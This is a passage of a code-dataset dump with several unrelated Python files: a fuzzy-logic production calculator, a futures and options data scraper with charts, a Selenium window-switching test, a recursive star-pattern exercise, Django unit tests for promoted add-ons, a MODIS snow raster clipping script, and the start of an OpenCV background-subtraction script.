produksi berkurang\r\n\tself.alpa[0]=min(self.permTurun,self.psdBanyak)\r\n\tself.z[0]=self.Zmax-self.alpa[0]*(self.Zmax-self.Zmin)\r\n\r\n\t#rule 2: Jika perm turun dan pesediaan sedikit maka produksi berkurang\r\n\tself.alpa[1]=min(self.permTurun,self.psdSedikit)\r\n\tself.z[1]=self.Zmax-self.alpa[1]*(self.Zmax-self.Zmin)\r\n\r\n\t#rule 3: Jika perm Naik, Persediaan Banyak maka Produksi bertambah\r\n\tself.alpa[2]=min(self.permNaik,self.psdBanyak)\r\n\tself.z[2]=self.alpa[2]*(self.Zmax-self.Zmin)+self.Zmin\r\n\r\n\t#rule 4: Jika perm Naik, Persediaan Sedikit,Maka produksi bertambah\r\n\tself.alpa[3]=min(self.permNaik,self.psdSedikit)\r\n\tself.z[3]=self.alpa[3]*(self.Zmax-self.Zmin)+self.Zmin\r\n\r\ndef defuzifikasi(self):\r\n\toutput=(self.alpa[0]*self.z[0])+(\r\n\t\tself.alpa[1]*self.z[1])+(self.alpa[2]*self.z[2])+(self.alpa[3]*self.z[3])\r\n\toutput1=self.alpa[0]+self.alpa[1]+self.alpa[2]+self.alpa[3]\r\n\treturn output/output1\r\n\r\n#main program\r\nfz= fuzzy(3200,140)\r\nprint(\"permintaan turun =\",fz.permTurun)\r\nprint(\"permintaan naik =\",fz.permNaik)\r\nprint(\"persediaan sedikit =\",fz.psdSedikit)\r\nprint(\"persediaan banyak =\",fz.psdBanyak)\r\nprint(\"nilai seluruh perdiket =\",fz.alpa)\r\nprint(\"nilai seluruh z =\",fz.z)\r\nprint(\"produksi adalah =\",fz.defuzifikasi())","repo_name":"achmadrosyid/python","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4448904857","text":"import pandas as pd\nfrom matplotlib.font_manager import findfont, FontProperties\nimport matplotlib.pyplot as plt\nimport os, csv, time, datetime, requests\n\n\nplt.rcParams['font.sans-serif'] = ['Microsoft JhengHei'] \nplt.rcParams['axes.unicode_minus'] = False\ntoday = datetime.date.today() #今日日期\nyesterday = str(today - datetime.timedelta(days=1))\ntoday = str(today)\npath = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\'\nt = time.localtime()\nt1 = time.asctime(t)\n\n#讀取昨日檔案, 可用pandas, 可用def\nyesterday_data = []\ndef load_file(load_date, list_data, file_date):\n if os.path.isfile(path +load_date + '.csv'): # 檢查檔案在不在\n print('yes,找到', file_date , '檔案')\n with open(path + load_date +'.csv', encoding='utf-8') as f:\n rows = csv.reader(f)\n for line in rows:\n if 'Foreign' in line:\n continue\n list_data.append(line)\n print(list_data)\n else:\n print('找不到', file_date, '檔案...')\n \nload_file(yesterday, yesterday_data, '昨日')\n\n\n#爬取 op & fu 資料 \nop = 'https://www.taifex.com.tw/cht/3/futAndOptDateExcel'\ntable = pd.read_html(requests.get(op, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\nfu_url = 'https://www.taifex.com.tw/cht/3/futContractsDateExcel'\nfu_table = pd.read_html(requests.get(fu_url, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\nop_bc_bp = 'https://www.taifex.com.tw/cht/3/callsAndPutsDateExcel'\nop_table = pd.read_html(requests.get(op_bc_bp, headers={'User-agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/63.0.3239.132 Safari/537.36'}).text)\n\n# sm_fu_call = int(fu_table[1].iloc[11][9]) + int(fu_table[1].iloc[9][9]) #外資和自營商小台\n# sm_fu_put = int(fu_table[1].iloc[11][11]) + int(fu_table[1].iloc[9][11]) #外資和自營商小台\n# fu_call_number_total = table[3].iloc[2, 1]\n# fu_put_number_total = table[3].iloc[2, 
5]\n\nsm_fu_call = int(fu_table[1].iloc[11][9])\nsm_fu_put = int(fu_table[1].iloc[11][11])\nfu_call_number = int(fu_table[1].iloc[2][9])\nfu_put_number = int(fu_table[1].iloc[2][11])\nop_call_money = int(table[3].iloc[2][4])\nop_put_money = int(table[3].iloc[2][8])\nop_call_number = int(table[3].iloc[2][2])\nop_put_number = int(table[3].iloc[2][6])\nfu_call_money = int(table[3].iloc[2][3])\nfu_put_money = int(table[3].iloc[2][7])\n#BCBP_SCSP分計\n# 外資\nbc_nb = int(op_table[1].iloc[2][10])\nsp_nb = int(op_table[1].iloc[5][12])\nbp_nb = int(op_table[1].iloc[5][10])\nsc_nb = int(op_table[1].iloc[2][12])\nbc_mny = int(op_table[1].iloc[2][11])\nsp_mny = int(op_table[1].iloc[5][13])\nbp_mny = int(op_table[1].iloc[5][11])\nsc_mny = int(op_table[1].iloc[2][13])\n#自營商\nbcsf_nb = int(op_table[1].iloc[0][10])\nbpsf_nb = int(op_table[1].iloc[3][10])\nscsf_nb = int(op_table[1].iloc[0][12])\nspsf_nb = int(op_table[1].iloc[3][12])\nbcsf_mny = int(op_table[1].iloc[0][11])\nbpsf_mny = int(op_table[1].iloc[3][11])\nscsf_mny = int(op_table[1].iloc[0][13])\nspsf_mny = int(op_table[1].iloc[3][13])\n\n\na = ['Op_call_money', 'Op_put_money', 'Op_call_number', 'Op_put_number', 'Fu_call_money', 'Fu_put_money', 'Fu_call_number', 'Fu_put_number', 'Sm_fu_call', 'Sm_fu_put',\n 'Bc_nb', 'Bp_nb', 'Bc_mny', 'Bp_mny', 'Sc_nb', 'Sp_nb', \"Sc_mny\", 'Sp_mny', 'bcsf_nb', 'bpsf_nb', 'bcsf_mny', 'bpsf_mny', 'scsf_nb', 'spsf_nb', 'scsf_mny', 'spsf_mny']\nb = [op_call_money, op_put_money, op_call_number,op_put_number, fu_call_money, fu_put_money, fu_call_number, fu_put_number, sm_fu_call, sm_fu_put,\n bc_nb, bp_nb, bc_mny, bp_mny, sc_nb, sp_nb, sc_mny, sp_mny, bcsf_nb, bpsf_nb, bcsf_mny, bpsf_mny, scsf_nb, spsf_nb, scsf_mny, spsf_mny]\ndata = pd.DataFrame({'Foreign' : a,'Amount' : b})\ndata.to_csv(path + str(today) +'.csv', index = False, sep=str(','), encoding='utf-8')\n\n\n\n#讀取今日檔案, 可用pandas\ntoday_data = []\nload_file(today, today_data, '今日')\n\n#資料分析\n\nyes_data_list = [int(yesterday_data[i][1]) for i in range(len(yesterday_data))]\ntoday_data_list = [int(today_data[i][1]) for i in range(len(today_data))]\ndif_list = [today_data_list[i] - yes_data_list[i] for i in range(len(today_data_list))]\nprint(dif_list)\n#Normalize \nNormalize_list = [dif_list[i] / today_data_list[i] for i in range(len(today_data_list))]\n\n\n\n\ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n plt.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ndef data_visualization(x_range, y_range, save_name, title):\n rects = plt.bar(x_range, y_range, color=['firebrick','g'])\n plt.title(title)\n autolabel(rects) #remark content\n path = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\' + today +'\\\\'\n if not os.path.isdir(path):\n os.mkdir(path)\n plt.savefig( path + today + save_name, dpi=200)\n plt.show()\n \ndef data_print(a=a, dif_list=dif_list):\n data_visualization(a[0:2], dif_list[0:2], '_外資總OP金額差異.png', '外資總OP金額差異')\n print('外資多單op增加', str(dif_list[0]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[0]))\n print('外資空單op增加', str(dif_list[1]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[1]))\n data_visualization(a[2:4], dif_list[2:4], '_外資總OP口數差異.png','外資總OP口數差異')\n print('外資多單總op增加', str(dif_list[2]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[2]))\n print('外資空單總op增加', 
str(dif_list[3]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[3]))\n data_visualization(a[4:6], dif_list[4:6], '_外資總期貨金額差異.png','外資總期貨金額差異')\n print('外資多單期貨增加', str(dif_list[4]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[4]))\n print('外資空單期貨增加', str(dif_list[5]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[5]))\n data_visualization(a[6:8], dif_list[6:8], '_外資大台期貨差異.png','外資大台期貨差異')\n print('外資多單期貨增加', str(dif_list[6]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[6]))\n print('外資空單期貨增加', str(dif_list[7]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[7]))\n data_visualization(a[8:10], dif_list[8:10], '_外資小台期貨差異.png','外資小台期貨差異')\n print('外資小台多單期貨增加', str(dif_list[8]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[8]))\n print('外資小台空單期貨增加', str(dif_list[9]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[9]))\n data_visualization(a[10:12], dif_list[10:12], '_外資BCBP口數差異.png','外資BCBP口數差異')\n print('外資BC增加', str(dif_list[10]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[10]))\n print('外資BP增加', str(dif_list[11]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[11]))\n data_visualization(a[12:14], dif_list[12:14], '_外資BCBP金額差異.png','外資BCBP金額差異')\n print('外資BC增加', str(dif_list[12]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[12]))\n print('外資BP增加', str(dif_list[13]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[13]))\n data_visualization(a[14:16], dif_list[14:16], '_外資SCSP口數差異.png','外資SCSP口數差異')\n print('外資SC增加', str(dif_list[14]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[14]))\n print('外資SP增加', str(dif_list[15]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[15]))\n data_visualization(a[16:18], dif_list[16:18], '_外資SCSP金額差異.png','外資SCSP金額差異')\n print('外資SC增加', str(dif_list[16]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[16]))\n print('外資SP增加', str(dif_list[17]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[17]))\n data_visualization(a[18:20], dif_list[18:20], '_自營BCBP口數差異.png','自營BCBP口數差異')\n print('自營BC增加', str(dif_list[18]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[18]))\n print('自營BP增加', str(dif_list[19]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[19]))\n data_visualization(a[20:22], dif_list[20:22], '_自營BCBP金額差異.png','自營BCBP金額差異')\n print('自營BC增加', str(dif_list[20]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[20]))\n print('自營BP增加', str(dif_list[21]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[21]))\n data_visualization(a[22:24], dif_list[22:24], '_自營SCSP口數差異.png','自營SCSP口數差異')\n print('自營SC增加', str(dif_list[22]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[22]))\n print('自營SP增加', str(dif_list[23]) , '口')\n print('percent: {:.2%}'.format(Normalize_list[23]))\n data_visualization(a[24:26], dif_list[24:26], '_自營SCS金額差異.png','自營SCSP金額差異')\n print('自營SC增加', str(dif_list[24]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[24]))\n print('自營SP增加', str(dif_list[25]) , '金額')\n print('percent: {:.2%}'.format(Normalize_list[25]))\n\n print(t1)\n\n #將圖畫在一張figure\n # path = 'C:\\\\Users\\\\RF\\\\Desktop\\\\coding\\\\op\\\\' + today +'\\\\'\n # plt.figure()\n # plt.subplot(1,2,1)\n # plt.bar(a[0:2], dif_list[0:2], color=['firebrick','g'])\n # plt.subplot(1,2,2)\n # plt.bar(a[2:4], dif_list[2:4], color=['firebrick','g'])\n # plt.savefig(path + str(today) + '_dif_op.png', dpi=200)\n # plt.show()\n\n # plt.figure()\n # plt.subplot(1,2,1)\n # plt.bar(a[4:6], dif_list[4:6], 
color=['firebrick','g'])\n # plt.subplot(1,2,2)\n # plt.bar(a[6:8], dif_list[6:8], color=['firebrick','g'])\n # plt.savefig(path + str(today) + '_dif_fu.png', dpi=200)\n # plt.show()\n\ndata_print()\n\n# import utils\n# uploaded_image = utils.UploadToImgur(path + str(today) + 'op_money_.png', title='123')\n\n# dpi=300\n#畫圖表,rot旋轉X軸座標名稱\n# datas = pd.Series(b, index=a)\n# datas.loc[['Op_call_money', 'Op_put_money']].plot(kind='bar', rot=0) \n# plt.ylim(ymax= 2500000) #設定座標Y軸上限","repo_name":"EasonPeng-TW/OP","sub_path":"op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":10660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72881441912","text":"from selenium import webdriver\r\nimport time\r\n\r\nclass Switch():\r\n def test(self):\r\n driver = webdriver.Chrome(\r\n executable_path=\"C:\\\\Users\\\\M524891\\\\PycharmProjects\\\\workspace_python\\\\drivers\\\\chromedriver.exe\")\r\n driver.maximize_window()\r\n driver.execute_script(\"window.location='https://letskodeit.teachable.com/p/practice';\")\r\n driver.implicitly_wait(3)\r\n parent_handle=driver.current_window_handle\r\n print(\"Parent Handle is \"+parent_handle)\r\n driver.find_element_by_id(\"openwindow\").click()\r\n time.sleep(2)\r\n sub_Handles = driver.window_handles\r\n for handle in sub_Handles:\r\n print(handle)\r\n print(type(handle))\r\n if handle not in parent_handle:\r\n driver.switch_to.window(handle)\r\n print(\"Currently in child handle\")\r\n driver.find_element_by_id(\"search-courses\").send_keys(\"Python\")\r\n time.sleep(2)\r\n break\r\n driver.switch_to.window(parent_handle)\r\n driver.find_element_by_id(\"name\").send_keys(\"testing done\")\r\n time.sleep(3)\r\n driver.quit()\r\n\r\ns=Switch()\r\ns.test()\r\n","repo_name":"pns845/Selenium","sub_path":"Module_22Switch.py","file_name":"Module_22Switch.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42327510342","text":"import sys\r\n\r\ndef count_star(n):\r\n ret = []\r\n for i in range(3*len(n)):\r\n if i//len(n) == 1:\r\n ret.append(n[i % len(n)] + \" \" * len(n) + n[i%len(n)])\r\n else:\r\n ret.append(n[i%len(n)]*3)\r\n return ret\r\n\r\n\r\nn = int(sys.stdin.readline())\r\nk = 0\r\nstar=[\"***\",\"* *\", \"***\"]\r\nwhile n != 3:\r\n n//=3\r\n k+=1\r\nfor i in range(k):\r\n star = count_star(star)\r\nfor i in star:\r\n print(i)\r\n","repo_name":"aeyongdodam/python","sub_path":"0307-0313/2447 - 별 찍기 - 10.py","file_name":"2447 - 별 찍기 - 10.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"23600168811","text":"import datetime\nfrom unittest import mock\n\nfrom django.conf import settings\nfrom django.test.utils import override_settings\n\nfrom olympia import amo, core\nfrom olympia.activity.models import ActivityLog\nfrom olympia.amo.tests import addon_factory, TestCase, user_factory\nfrom olympia.amo.urlresolvers import reverse\nfrom olympia.constants import applications, promoted\nfrom olympia.promoted.models import (\n PromotedAddon,\n PromotedApproval,\n PromotedSubscription,\n)\n\n\nclass TestPromotedAddon(TestCase):\n def test_basic(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n assert promoted_addon.group == promoted.SPONSORED\n assert promoted_addon.application_id is None\n assert 
promoted_addon.all_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n promoted_addon.update(application_id=applications.FIREFOX.id)\n assert promoted_addon.all_applications == [applications.FIREFOX]\n\n def test_is_approved_applications(self):\n addon = addon_factory()\n promoted_addon = PromotedAddon.objects.create(\n addon=addon, group_id=promoted.LINE.id\n )\n assert addon.promotedaddon\n # Just having the PromotedAddon instance isn't enough\n assert addon.promotedaddon.approved_applications == []\n\n # the current version needs to be approved also\n promoted_addon.approve_for_version(addon.current_version)\n addon.reload()\n assert addon.promotedaddon.approved_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n # but not if it's for a different type of promotion\n promoted_addon.update(group_id=promoted.SPONSORED.id)\n assert addon.promotedaddon.approved_applications == []\n # unless that group has an approval too\n PromotedApproval.objects.create(\n version=addon.current_version,\n group_id=promoted.SPONSORED.id,\n application_id=applications.FIREFOX.id,\n )\n addon.reload()\n assert addon.promotedaddon.approved_applications == [applications.FIREFOX]\n\n # for promoted groups that don't require pre-review though, there isn't\n # a per version approval, so a current_version is sufficient and all\n # applications are seen as approved.\n promoted_addon.update(group_id=promoted.STRATEGIC.id)\n assert addon.promotedaddon.approved_applications == [\n applications.FIREFOX,\n applications.ANDROID,\n ]\n\n def test_creates_a_subscription_when_group_should_have_one(self):\n assert PromotedSubscription.objects.count() == 0\n\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n\n assert PromotedSubscription.objects.count() == 1\n assert PromotedSubscription.objects.all()[0].promoted_addon == promoted_addon\n\n # Do not create a subscription twice.\n promoted_addon.save()\n assert PromotedSubscription.objects.count() == 1\n\n def test_no_subscription_created_when_group_should_not_have_one(self):\n assert PromotedSubscription.objects.count() == 0\n\n PromotedAddon.objects.create(addon=addon_factory(), group_id=promoted.LINE.id)\n\n assert PromotedSubscription.objects.count() == 0\n\n def test_auto_approves_addon_when_saved_for_immediate_approval(self):\n # empty case with no group set\n promo = PromotedAddon.objects.create(\n addon=addon_factory(), application_id=amo.FIREFOX.id\n )\n assert promo.group == promoted.NOT_PROMOTED\n assert promo.approved_applications == []\n assert not PromotedApproval.objects.exists()\n\n # first test with a group.immediate_approval == False\n promo.group_id = promoted.RECOMMENDED.id\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == []\n assert not PromotedApproval.objects.exists()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n\n # then with a group thats immediate_approval == True\n promo.group_id = promoted.SPOTLIGHT.id\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == [amo.FIREFOX]\n assert PromotedApproval.objects.count() == 1\n promo.addon.promoted_group() == promoted.SPOTLIGHT\n\n # test the edge case where the application was changed afterwards\n promo.application_id = 0\n promo.save()\n promo.addon.reload()\n assert promo.approved_applications == [amo.FIREFOX, amo.ANDROID]\n assert PromotedApproval.objects.count() == 2\n\n @mock.patch('olympia.lib.crypto.tasks.sign_file')\n def 
test_approve_for_addon(self, mock_sign_file):\n core.set_user(user_factory())\n task_user = user_factory(id=settings.TASK_USER_ID)\n promo = PromotedAddon.objects.create(\n addon=addon_factory(version_kw={'version': '0.123a'}),\n group_id=promoted.SPOTLIGHT.id,\n )\n file_ = promo.addon.current_version.all_files[0]\n file_.update(filename='webextension.xpi')\n with amo.tests.copy_file(\n 'src/olympia/files/fixtures/files/webextension.xpi', file_.file_path\n ):\n # SPOTLIGHT doesnt have special signing states so won't be resigned\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n promo.approve_for_addon()\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.SPOTLIGHT\n assert promo.addon.current_version.version == '0.123a'\n mock_sign_file.assert_not_called()\n\n # VERIFIED does though.\n promo.update(group_id=promoted.VERIFIED.id)\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.NOT_PROMOTED\n promo.approve_for_addon()\n promo.addon.reload()\n promo.addon.promoted_group() == promoted.VERIFIED\n assert promo.addon.current_version.version == '0.123a.1-signed'\n mock_sign_file.assert_called_with(file_)\n assert (\n ActivityLog.objects.for_addons((promo.addon,))\n .filter(action=amo.LOG.VERSION_RESIGNED.id)\n .exists()\n )\n alog = ActivityLog.objects.filter(action=amo.LOG.VERSION_RESIGNED.id).get()\n assert alog.user == task_user\n assert '0.123a.1-signed re-signed (previously 0.123a)' in (str(alog))\n\n def test_get_resigned_version_number(self):\n addon = addon_factory(\n version_kw={'version': '0.123a'},\n file_kw={'status': amo.STATUS_AWAITING_REVIEW},\n )\n promo = PromotedAddon.objects.create(addon=addon, group_id=promoted.VERIFIED.id)\n assert addon.current_version is not None\n assert promo.get_resigned_version_number() is None\n\n addon.current_version.current_file.update(status=amo.STATUS_APPROVED)\n assert promo.get_resigned_version_number() == '0.123a.1-signed'\n\n addon.current_version.update(version='123.4.1-signed')\n assert promo.get_resigned_version_number() == '123.4.1-signed-2'\n\n addon.current_version.update(version='123.4.1-signed-2')\n assert promo.get_resigned_version_number() == '123.4.1-signed-3'\n\n addon.current_version.delete()\n addon.reload()\n assert addon.current_version is None\n assert promo.get_resigned_version_number() is None\n\n def test_has_pending_subscription(self):\n promo = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.RECOMMENDED.id\n )\n PromotedSubscription.objects.create(promoted_addon=promo)\n\n # checking the group doesn't require subscription\n assert not promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert not promo.has_pending_subscription\n\n # and when it does\n promo.update(group_id=promoted.VERIFIED.id)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there isn't a subscription (existing promo before subscriptions)\n promo.promotedsubscription.delete()\n promo = PromotedAddon.objects.get(id=promo.id)\n assert promo.group.require_subscription\n assert not hasattr(promo, 'promotedsubscription')\n assert not promo.has_pending_subscription\n\n # and when there is\n PromotedSubscription.objects.create(promoted_addon=promo)\n assert promo.group.require_subscription\n 
assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there's a subscription that's been paid\n promo.promotedsubscription.update(checkout_completed_at=datetime.datetime.now())\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert not promo.has_pending_subscription\n\n # and when it's not been paid\n promo.promotedsubscription.update(checkout_completed_at=None)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert not promo.has_approvals\n assert promo.has_pending_subscription\n\n # when there's an existing version approved (existing promo)\n promo.approve_for_version(promo.addon.current_version)\n assert promo.group.require_subscription\n assert hasattr(promo, 'promotedsubscription')\n assert not promo.promotedsubscription.is_active\n assert promo.has_approvals\n assert not promo.has_pending_subscription\n\n def test_has_approvals(self):\n addon = addon_factory()\n promoted_addon = PromotedAddon.objects.create(\n addon=addon, group_id=promoted.SPONSORED.id\n )\n\n assert not promoted_addon.has_approvals\n\n promoted_addon.approve_for_version(addon.current_version)\n promoted_addon.reload()\n\n assert promoted_addon.has_approvals\n\n\nclass TestPromotedSubscription(TestCase):\n def test_get_onboarding_url_with_new_object(self):\n sub = PromotedSubscription()\n\n assert sub.get_onboarding_url() is None\n\n def test_get_relative_onboarding_url(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n sub = PromotedSubscription.objects.filter(promoted_addon=promoted_addon).get()\n\n assert sub.get_onboarding_url(absolute=False) == reverse(\n 'devhub.addons.onboarding_subscription',\n args=[sub.promoted_addon.addon.slug],\n add_prefix=False,\n )\n\n def test_get_onboarding_url(self):\n promoted_addon = PromotedAddon.objects.create(\n addon=addon_factory(), group_id=promoted.SPONSORED.id\n )\n sub = PromotedSubscription.objects.filter(promoted_addon=promoted_addon).get()\n\n external_site_url = 'http://example.org'\n with override_settings(EXTERNAL_SITE_URL=external_site_url):\n url = sub.get_onboarding_url()\n assert url == '{}{}'.format(\n external_site_url,\n reverse(\n 'devhub.addons.onboarding_subscription',\n args=[sub.promoted_addon.addon.slug],\n add_prefix=False,\n ),\n )\n assert 'en-US' not in url\n\n def test_stripe_checkout_completed(self):\n sub = PromotedSubscription()\n\n assert not sub.stripe_checkout_completed\n\n sub.update(checkout_completed_at=datetime.datetime.now())\n\n assert sub.stripe_checkout_completed\n\n def test_stripe_checkout_cancelled(self):\n sub = PromotedSubscription()\n\n assert not sub.stripe_checkout_cancelled\n\n sub.update(checkout_cancelled_at=datetime.datetime.now())\n\n assert sub.stripe_checkout_cancelled\n\n def test_is_active(self):\n sub = PromotedSubscription()\n\n assert sub.is_active is None\n\n sub.update(checkout_completed_at=datetime.datetime.now())\n\n assert sub.is_active\n\n sub.update(cancelled_at=datetime.datetime.now())\n\n assert sub.is_active is 
False\n","repo_name":"imfht/djangoapps","sub_path":"addons-server-master/src/olympia/promoted/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":12896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"3985856328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 16 10:21:20 2021\n\n@author: karlo\n\"\"\"\n\n\nimport pandas as pd\nimport geopandas as gpd\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rioxarray as rxr\nfrom shapely.geometry import mapping\nfrom datetime import datetime\nimport datetime as dt\n\n\ndef hdf_clip(raster_folder, shape_file):\n \"\"\"\n Function reads the 8-day.hdf raster from raster folder, and .shp shapefile\n used to clip them.\n It creates a list of tuples, which hold the date and the snow data.\n Since, data is available only each 8th day, the 1st day data gets copied\n until next day (data) is available. \n \n Parameters\n ----------\n raster_folder : string \n - path to folder with .hdf rasters\n shape_file : string\n - path to the shapefile of the basin\n\n Returns\n -------\n clipps : list of tuples\n Clipped numpy arrays.\n \"\"\"\n clipps = list()\n rasters = [ras for ras in os.listdir(raster_folder) if ras.endswith(\".hdf\")] # lists all rasters\n shape = gpd.read_file(shape_file, crs=\"epsg:4326\") # reads the shapefile for clipping\n for idx, raster in enumerate(rasters):\n doy = raster[13:16] \n year = raster[9:13]\n xds = rxr.open_rasterio(raster_folder + raster, masked=True, chunks=True)\n clipped = xds.rio.clip(shape.geometry.apply(mapping), shape.crs, drop=True) # clipping the rasters\n \"\"\" Creating the datetime date of the data paoint, and snow data .\"\"\" \n date = datetime.strptime(year + \"-\" + doy, \"%Y-%j\")\n snow = np.nan_to_num(clipped.Maximum_Snow_Extent.values.squeeze())\n # converting the date to string wit CRO format\n data = (date, snow) # creatingthe data tuple\n if clipps: # if list not empty\n prev_date = clipps[-1][0] # checkign last entry in the list\n now_date = date\n diff = abs(prev_date - now_date) - dt.timedelta(1) # calculating the number of \"missing\" days\n print (\"The difference is {}.\".format(diff)) \n if diff > dt.timedelta(50): \n print (\"The difference is {}. Check the {} raster!\".format(diff, date))\n else:\n for _ in range(diff.days): # iterating over day difference\n date_ = clipps[-1][0]\n date_time, snow = date_ + dt.timedelta(1), clipps[-1][1]\n \"\"\" Creating the datetime date of the data paoint, and \n copying snow data from the last entry in the list.\"\"\"\n clipps.append((date_time, snow)) # appending the copied data to the list\n prev_date += dt.timedelta(1)\n clipps.append(data) # appending the clipped raster data to the list \n print(\"Clipping rasters has been finished. 
The raster have been saved to the list clipps.\")\n return clipps \n \n\ndef create_raster_files(basin_name, input_folder, output_folder):\n \"\"\"\n The function takes default Modis rasters, executes the hadf_clip function for the desired basin\n and returns seperate .npy files for each day in the desired output folder.\n\n Parameters\n ----------\n basin_name : str\n Name of the basin (should be in basin folder).\n input_folder : str\n Path to the input folder with uncuit MODIS .hdf rasters.\n output_folder : str\n Path to the output folder.\n\n Returns\n -------\n None.\n\n \"\"\"\n hdf_raster_folder = \"D:\\\\OneDrive\\\\Python\\\\12_pyModis\\\\\" + input_folder + \"\\\\\"\n shape_file = \"D:\\\\OneDrive\\\\Python\\\\12_pyModis\\\\basin\\\\\" + basin_name + \"\\\\\" +basin_name +\"_Basin.shp\"\n clipps = hdf_clip(hdf_raster_folder, shape_file)\n if not os.path.isdir(output_folder +\"\\\\\"):\n os.mkdir(output_folder +\"\\\\\")\n for (date, raster) in clipps:\n date = str(date)[:10]\n np.save(output_folder + \"\\\\\" + date + \".npy\", raster)\n print (\"Creating files have been finished. The files have been saved to the folder {}.\".format(output_folder)) \n\n\n\n\n \n\n\n\n\n\nif __name__ == '__main__':\n \n basin_name = \"Sill\"\n input_folder = \"data_modis_complete\"\n output_folder = \"D:\\\\Sill_modis\"\n \n clipps = create_raster_files(basin_name, input_folder, output_folder)\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"karlek10/pyModis","sub_path":"prepare_MODIS.py","file_name":"prepare_MODIS.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12399094891","text":"# -*- coding: UTF-8 -*-\n#使用BackgroundSubtractorMOG\nimport cv2 as cv\nimport numpy as np\n\n# 设置文件\n# file_test = \"E:/opencv_vs/opencv/sources/samples/data/vtest.avi\"\ncap = cv.VideoCapture(0)\n\n# 设置变量\nkernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (2, 2)) # 定义结构元素\ncolor_m = (255, 0, 0)\n\n# 背景差法\nfgbg = cv.bgsegm.createBackgroundSubtractorMOG()\n\n# 视频文件输出参数设置\nout_fps = 12.0 # 输出文件的帧率\nfourcc = cv.VideoWriter_fourcc('M', 'P', '4', '2')\nout = cv.VideoWriter('E:/video/v9.avi', fourcc, out_fps, (500, 500))\n\nwhile True:\n # 读取一帧\n ret, frame = cap.read()\n # 